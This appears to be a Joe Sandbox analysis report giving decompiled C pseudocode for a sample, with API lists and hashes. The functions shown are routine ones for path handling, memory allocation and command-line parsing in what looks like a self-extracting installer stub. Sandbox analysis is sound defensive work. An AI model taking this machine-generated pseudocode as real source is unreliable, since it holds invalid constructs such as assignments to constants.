                                                                                                                                                                                                          • Part of subcall function 001F3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 001F369F
                                                                                                                                                                                                          • Part of subcall function 001F3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001F36B2
                                                                                                                                                                                                          • Part of subcall function 001F3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 001F36DA
                                                                                                                                                                                                        • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 001F4B05
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 1084409-0
                                                                                                                                                                                                        • Opcode ID: df752bb6f930c4725e292c380ca321fc149079ea4d9a2bfc43cb81995cd010ba
                                                                                                                                                                                                        • Instruction ID: a3cf50ef06bde09e54d596e3fead39a36cb20d38290920e9e7ba211be9100817
                                                                                                                                                                                                        • Opcode Fuzzy Hash: df752bb6f930c4725e292c380ca321fc149079ea4d9a2bfc43cb81995cd010ba
                                                                                                                                                                                                        • Instruction Fuzzy Hash: CD01BC71200209ABDB189F68EC05BB77769FF84725F148225FA399B5F1CB70D892CB80
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                        				intOrPtr _t4;
                                                                                                                                                                                                        				char* _t6;
                                                                                                                                                                                                        				char* _t8;
                                                                                                                                                                                                        				void* _t10;
                                                                                                                                                                                                        				void* _t12;
                                                                                                                                                                                                        				char* _t16;
                                                                                                                                                                                                        				intOrPtr* _t17;
                                                                                                                                                                                                        				void* _t18;
                                                                                                                                                                                                        				char* _t19;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = __ecx;
                                                                                                                                                                                                        				_t10 = __edx;
                                                                                                                                                                                                        				_t17 = __ecx;
                                                                                                                                                                                                        				_t1 = _t17 + 1; // 0x1f8b3f
                                                                                                                                                                                                        				_t12 = _t1;
                                                                                                                                                                                                        				do {
                                                                                                                                                                                                        					_t4 =  *_t17;
                                                                                                                                                                                                        					_t17 = _t17 + 1;
                                                                                                                                                                                                        				} while (_t4 != 0);
                                                                                                                                                                                                        				_t18 = _t17 - _t12;
                                                                                                                                                                                                        				_t2 = _t18 + 1; // 0x1f8b40
                                                                                                                                                                                                        				if(_t2 < __edx) {
                                                                                                                                                                                                        					_t19 = _t18 + __ecx;
                                                                                                                                                                                                        					if(_t19 > __ecx) {
                                                                                                                                                                                                        						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                        						if( *_t8 != 0x5c) {
                                                                                                                                                                                                        							 *_t19 = 0x5c;
                                                                                                                                                                                                        							_t19 =  &(_t19[1]);
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t6 = _a4;
                                                                                                                                                                                                        					 *_t19 = 0;
                                                                                                                                                                                                        					while( *_t6 == 0x20) {
                                                                                                                                                                                                        						_t6 = _t6 + 1;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					return E001F16B3(_t16, _t10, _t6);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return 0x8007007a;
                                                                                                                                                                                                        			}













                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • CharPrevA.USER32(001F8B3E,001F8B3F,00000001,001F8B3E,-00000003,?,001F60EC,001F1140,?), ref: 001F65BA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: CharPrev
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 122130370-0
                                                                                                                                                                                                        • Opcode ID: f5bdef4efa60ca2af5241b522c8ee4b62a99a6726affe6650f4eb9415bfc4571
                                                                                                                                                                                                        • Instruction ID: fb7eb16efeb9974fd4a7747824d6cad2b0bad8000a6b8e17e5e7fa5c30f4a3d6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: f5bdef4efa60ca2af5241b522c8ee4b62a99a6726affe6650f4eb9415bfc4571
                                                                                                                                                                                                        • Instruction Fuzzy Hash: BBF0A2321082589BD731051D9884B76BFCD9B96390F19015EEADEE3229CB554C4283A0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E001F621E() {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				signed int _t5;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				void* _t13;
                                                                                                                                                                                                        				void* _t19;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				signed int _t21;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t5 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					0x4f0 = 2;
                                                                                                                                                                                                        					_t9 = E001F597D( &_v268, 0x4f0, _t19, 0x4f0); // executed
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					E001F44B9(0, 0x4f0, _t8, _t8, 0x10, _t8);
                                                                                                                                                                                                        					 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        					_t9 = 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E001F6CE0(_t9, _t13, _v8 ^ _t21, 0x4f0, _t19, _t20);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 001F623F
                                                                                                                                                                                                          • Part of subcall function 001F44B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 001F4518
                                                                                                                                                                                                          • Part of subcall function 001F44B9: MessageBoxA.USER32(?,?,cent,00010010), ref: 001F4554
                                                                                                                                                                                                          • Part of subcall function 001F6285: GetLastError.KERNEL32(001F5BBC), ref: 001F6285
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryErrorLastLoadMessageStringWindows
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 381621628-0
                                                                                                                                                                                                        • Opcode ID: abf7e8449c13bcf8b6a9853b746c3841ac6d190af39e278d363875eced9385d3
                                                                                                                                                                                                        • Instruction ID: 2f3088d780d43c292668c8d1f85188d5cd922cbe29c4de26837265bf4e9d9a11
                                                                                                                                                                                                        • Opcode Fuzzy Hash: abf7e8449c13bcf8b6a9853b746c3841ac6d190af39e278d363875eced9385d3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2BF082B070420CABE754EB749D06FBE77ACDBA4700F40046ABB8AD6191EF749D94C650
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F4B60(signed int _a4) {
                                                                                                                                                                                                        				signed int _t9;
                                                                                                                                                                                                        				signed int _t15;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t15 = _a4 * 0x18;
                                                                                                                                                                                                        				if( *((intOrPtr*)(_t15 + 0x1f8d64)) != 1) {
                                                                                                                                                                                                        					_t9 = FindCloseChangeNotification( *(_t15 + 0x1f8d74)); // executed
                                                                                                                                                                                                        					if(_t9 == 0) {
                                                                                                                                                                                                        						return _t9 | 0xffffffff;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					 *((intOrPtr*)(_t15 + 0x1f8d60)) = 1;
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x1f8d60)) = 1;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x1f8d68)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x1f8d70)) = 0;
                                                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x1f8d6c)) = 0;
                                                                                                                                                                                                        				return 0;
                                                                                                                                                                                                        			}






                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,001F4FA1,00000000), ref: 001F4B98
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2591292051-0
                                                                                                                                                                                                        • Opcode ID: 2bc7f0849eb4e67dc1debc1c6d35efeb66a5a254fbb94c48122fc7100b9ee426
                                                                                                                                                                                                        • Instruction ID: 9865eedb74ef24e3890dfdcca260e5a8413c74db73dda792163dea5fb421cc6f
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2bc7f0849eb4e67dc1debc1c6d35efeb66a5a254fbb94c48122fc7100b9ee426
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AAF012B1500B0C9FC771DFB9DC08673BBE4AF95365310892E957ED2195EB30A441CB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F66AE(CHAR* __ecx) {
                                                                                                                                                                                                        				unsigned int _t1;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t1 = GetFileAttributesA(__ecx); // executed
                                                                                                                                                                                                        				if(_t1 != 0xffffffff) {
                                                                                                                                                                                                        					return  !(_t1 >> 4) & 0x00000001;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					return 0;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        			}





                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetFileAttributesA.KERNELBASE(?,001F4777,?,001F4E38,?), ref: 001F66B1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AttributesFile
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3188754299-0
                                                                                                                                                                                                        • Opcode ID: 757f0d580610affaf3cc133fbec45f39e4a1f7d8720824756b8f677ea7ad738b
                                                                                                                                                                                                        • Instruction ID: 1881618b0e7ac187b8e3e25a1bd24e0e7992a5eedc0a2a307c65f4487a091f8d
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 757f0d580610affaf3cc133fbec45f39e4a1f7d8720824756b8f677ea7ad738b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F1B092B6222444426A2006317C295662941ABC123A7E81B90F136C15E0CF3EC886D008
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F4CA0(long _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalAlloc(0, _a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x001f4caa
                                                                                                                                                                                                        0x001f4cb1

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GlobalAlloc.KERNELBASE(00000000,?), ref: 001F4CAA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AllocGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3761449716-0
                                                                                                                                                                                                        • Opcode ID: 8007cc6c70b6207f5038433654b322569804678d27e17eec9130a95ddabd79ff
                                                                                                                                                                                                        • Instruction ID: 949d4ce371fbea99f71b3594202001e0d6376ec1812cba82484c015eccea9438
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8007cc6c70b6207f5038433654b322569804678d27e17eec9130a95ddabd79ff
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7AB0123204420CB7CF001FC2FC09F953F1DEBC4761F540000F60C454908E729450C69A
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E001F4CC0(void* _a4) {
                                                                                                                                                                                                        				void* _t2;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t2 = GlobalFree(_a4); // executed
                                                                                                                                                                                                        				return _t2;
                                                                                                                                                                                                        			}




                                                                                                                                                                                                        0x001f4cc8
                                                                                                                                                                                                        0x001f4ccf

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000002.00000002.416726186.00000000001F1000.00000020.00000001.01000000.00000005.sdmp, Offset: 001F0000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000002.00000002.416711728.00000000001F0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416738659.00000000001F8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        • Associated: 00000002.00000002.416749520.00000000001FC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_2_2_1f0000_stL82bL52.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: FreeGlobal
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2979337801-0
                                                                                                                                                                                                        • Opcode ID: bc7718e0601165afcdfc1a0d48c2609b7307bbbf6874da5ab927e02d51dd2f43
                                                                                                                                                                                                        • Instruction ID: 0def3339632b7732d541187a936af4c97673b7035ccc48bf137e9792e42acdeb
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bc7718e0601165afcdfc1a0d48c2609b7307bbbf6874da5ab927e02d51dd2f43
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 92B0123100010CB78F001B42FC088553F1DDBC02607400010F50C414218F379851C585
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 92%
                                                                                                                                                                                                        			E001F5C9E(void* __ebx, CHAR* __ecx, void* __edi, void* __esi) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				signed int _v12;
                                                                                                                                                                                                        				CHAR* _v265;
                                                                                                                                                                                                        				char _v266;
                                                                                                                                                                                                        				char _v267;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				CHAR* _v272;
                                                                                                                                                                                                        				char _v276;
                                                                                                                                                                                                        				signed int _v296;
                                                                                                                                                                                                        				char _v556;
                                                                                                                                                                                                        				signed int _t61;
                                                                                                                                                                                                        				int _t63;
                                                                                                                                                                                                        				char _t67;
                                                                                                                                                                                                        				CHAR* _t69;
                                                                                                                                                                                                        				signed int _t71;
                                                                                                                                                                                                        				void* _t75;
                                                                                                                                                                                                        				char _t79;
                                                                                                                                                                                                        				void* _t83;
                                                                                                                                                                                                        				void* _t85;
                                                                                                                                                                                                        				void* _t87;
                                                                                                                                                                                                        				intOrPtr _t88;
                                                                                                                                                                                                        				void* _t100;
                                                                                                                                                                                                        				intOrPtr _t101;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				intOrPtr _t105;
                                                                                                                                                                                                        				void* _t111;
                                                                                                                                                                                                        				void* _t115;
                                                                                                                                                                                                        				CHAR* _t118;
                                                                                                                                                                                                        				void* _t119;
                                                                                                                                                                                                        				void* _t127;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				void* _t132;
                                                                                                                                                                                                        				void* _t142;
                                                                                                                                                                                                        				signed int _t143;
                                                                                                                                                                                                        				CHAR* _t144;
                                                                                                                                                                                                        				void* _t145;
                                                                                                                                                                                                        				void* _t146;
                                                                                                                                                                                                        				void* _t147;
                                                                                                                                                                                                        				void* _t149;
                                                                                                                                                                                                        				char _t155;
                                                                                                                                                                                                        				void* _t157;
                                                                                                                                                                                                        				void* _t162;
                                                                                                                                                                                                        				void* _t163;
                                                                                                                                                                                                        				char _t167;
                                                                                                                                                                                                        				char _t170;
                                                                                                                                                                                                        				CHAR* _t173;
                                                                                                                                                                                                        				void* _t177;
                                                                                                                                                                                                        				intOrPtr* _t183;
                                                                                                                                                                                                        				intOrPtr* _t192;
                                                                                                                                                                                                        				CHAR* _t199;
                                                                                                                                                                                                        				void* _t200;
                                                                                                                                                                                                        				CHAR* _t201;
                                                                                                                                                                                                        				void* _t205;
                                                                                                                                                                                                        				void* _t206;
                                                                                                                                                                                                        				int _t209;
                                                                                                                                                                                                        				void* _t210;
                                                                                                                                                                                                        				void* _t212;
                                                                                                                                                                                                        				void* _t213;
                                                                                                                                                                                                        				CHAR* _t218;
                                                                                                                                                                                                        				intOrPtr* _t219;
                                                                                                                                                                                                        				intOrPtr* _t220;
                                                                                                                                                                                                        				signed int _t221;
                                                                                                                                                                                                        				signed int _t223;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t173 = __ecx;
                                                                                                                                                                                                        				_t61 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        				_v8 = _t61 ^ _t221;
                                                                                                                                                                                                        				_push(__ebx);
                                                                                                                                                                                                        				_push(__esi);
                                                                                                                                                                                                        				_push(__edi);
                                                                                                                                                                                                        				_t209 = 1;
                                                                                                                                                                                                        				if(__ecx == 0 ||  *__ecx == 0) {
                                                                                                                                                                                                        					_t63 = 1;
                                                                                                                                                                                                        				} else {
                                                                                                                                                                                                        					L2:
                                                                                                                                                                                                        					while(_t209 != 0) {
                                                                                                                                                                                                        						_t67 =  *_t173;
                                                                                                                                                                                                        						if(_t67 == 0x20 || _t67 == 9 || _t67 == 0xd || _t67 == 0xa || _t67 == 0xb || _t67 == 0xc) {
                                                                                                                                                                                                        							_t173 = CharNextA(_t173);
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v272 = _t173;
                                                                                                                                                                                                        						if(_t67 == 0) {
                                                                                                                                                                                                        							break;
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							_t69 = _v272;
                                                                                                                                                                                                        							_t177 = 0;
                                                                                                                                                                                                        							_t213 = 0;
                                                                                                                                                                                                        							_t163 = 0;
                                                                                                                                                                                                        							_t202 = 1;
                                                                                                                                                                                                        							do {
                                                                                                                                                                                                        								if(_t213 != 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L21;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									_t69 =  *_t69;
                                                                                                                                                                                                        									if(_t69 == 0x20 || _t69 == 9 || _t69 == 0xd || _t69 == 0xa || _t69 == 0xb || _t69 == 0xc) {
                                                                                                                                                                                                        										break;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										_t69 = _v272;
                                                                                                                                                                                                        										L21:
                                                                                                                                                                                                        										_t155 =  *_t69;
                                                                                                                                                                                                        										if(_t155 != 0x22) {
                                                                                                                                                                                                        											if(_t202 >= 0x104) {
                                                                                                                                                                                                        												goto L106;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												 *((char*)(_t221 + _t177 - 0x108)) = _t155;
                                                                                                                                                                                                        												_t177 = _t177 + 1;
                                                                                                                                                                                                        												_t202 = _t202 + 1;
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										} else {
                                                                                                                                                                                                        											if(_v272[1] == 0x22) {
                                                                                                                                                                                                        												if(_t202 >= 0x104) {
                                                                                                                                                                                                        													L106:
                                                                                                                                                                                                        													_t63 = 0;
                                                                                                                                                                                                        													L125:
                                                                                                                                                                                                        													_pop(_t210);
                                                                                                                                                                                                        													_pop(_t212);
                                                                                                                                                                                                        													_pop(_t162);
                                                                                                                                                                                                        													return E001F6CE0(_t63, _t162, _v8 ^ _t221, _t202, _t210, _t212);
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													 *((char*)(_t221 + _t177 - 0x108)) = 0x22;
                                                                                                                                                                                                        													_t177 = _t177 + 1;
                                                                                                                                                                                                        													_t202 = _t202 + 1;
                                                                                                                                                                                                        													_t157 = 2;
                                                                                                                                                                                                        													goto L30;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t157 = 1;
                                                                                                                                                                                                        												if(_t213 != 0) {
                                                                                                                                                                                                        													_t163 = 1;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t213 = 1;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L30;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L131;
                                                                                                                                                                                                        								L30:
                                                                                                                                                                                                        								_v272 =  &(_v272[_t157]);
                                                                                                                                                                                                        								_t69 = _v272;
                                                                                                                                                                                                        							} while ( *_t69 != 0);
                                                                                                                                                                                                        							if(_t177 >= 0x104) {
                                                                                                                                                                                                        								E001F6E2A(_t69, _t163, _t177, _t202, _t209, _t213);
                                                                                                                                                                                                        								asm("int3");
                                                                                                                                                                                                        								_push(_t221);
                                                                                                                                                                                                        								_t222 = _t223;
                                                                                                                                                                                                        								_t71 =  *0x1f8004; // 0xfcdc6e1a
                                                                                                                                                                                                        								_v296 = _t71 ^ _t223;
                                                                                                                                                                                                        								if(GetWindowsDirectoryA( &_v556, 0x104) != 0) {
                                                                                                                                                                                                        									0x4f0 = 2;
                                                                                                                                                                                                        									_t75 = E001F597D( &_v272, 0x4f0, _t209, 0x4f0); // executed
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									E001F44B9(0, 0x4f0, _t74, _t74, 0x10, _t74);
                                                                                                                                                                                                        									 *0x1f9124 = E001F6285();
                                                                                                                                                                                                        									_t75 = 0;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								return E001F6CE0(_t75, _t163, _v12 ^ _t222, 0x4f0, _t209, _t213);
                                                                                                                                                                                                        							} else {
                                                                                                                                                                                                        								 *((char*)(_t221 + _t177 - 0x108)) = 0;
                                                                                                                                                                                                        								if(_t213 == 0) {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										goto L34;
                                                                                                                                                                                                        									} else {
                                                                                                                                                                                                        										goto L40;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        								} else {
                                                                                                                                                                                                        									if(_t163 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										_t79 = _v268;
                                                                                                                                                                                                        										if(_t79 == 0x2f || _t79 == 0x2d) {
                                                                                                                                                                                                        											_t83 = CharUpperA(_v267) - 0x3f;
                                                                                                                                                                                                        											if(_t83 == 0) {
                                                                                                                                                                                                        												_t202 = 0x521;
                                                                                                                                                                                                        												E001F44B9(0, 0x521, 0x1f1140, 0, 0x40, 0);
                                                                                                                                                                                                        												_t85 =  *0x1f8588; // 0x0
                                                                                                                                                                                                        												if(_t85 != 0) {
                                                                                                                                                                                                        													CloseHandle(_t85);
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												ExitProcess(0);
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											_t87 = _t83 - 4;
                                                                                                                                                                                                        											if(_t87 == 0) {
                                                                                                                                                                                                        												if(_v266 != 0) {
                                                                                                                                                                                                        													if(_v266 != 0x3a) {
                                                                                                                                                                                                        														goto L49;
                                                                                                                                                                                                        													} else {
                                                                                                                                                                                                        														_t167 = (0 | _v265 == 0x00000022) + 3;
                                                                                                                                                                                                        														_t215 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t183 =  &_v268 + _t167;
                                                                                                                                                                                                        														_t50 = _t183 + 1; // 0x1
                                                                                                                                                                                                        														_t202 = _t50;
                                                                                                                                                                                                        														do {
                                                                                                                                                                                                        															_t88 =  *_t183;
                                                                                                                                                                                                        															_t183 = _t183 + 1;
                                                                                                                                                                                                        														} while (_t88 != 0);
                                                                                                                                                                                                        														if(_t183 == _t202) {
                                                                                                                                                                                                        															goto L49;
                                                                                                                                                                                                        														} else {
                                                                                                                                                                                                        															_t205 = 0x5b;
                                                                                                                                                                                                        															if(E001F667F(_t215, _t205) == 0) {
                                                                                                                                                                                                        																L115:
                                                                                                                                                                                                        																_t206 = 0x5d;
                                                                                                                                                                                                        																if(E001F667F(_t215, _t206) == 0) {
                                                                                                                                                                                                        																	L117:
                                                                                                                                                                                                        																	_t202 =  &_v276;
                                                                                                                                                                                                        																	_v276 = _t167;
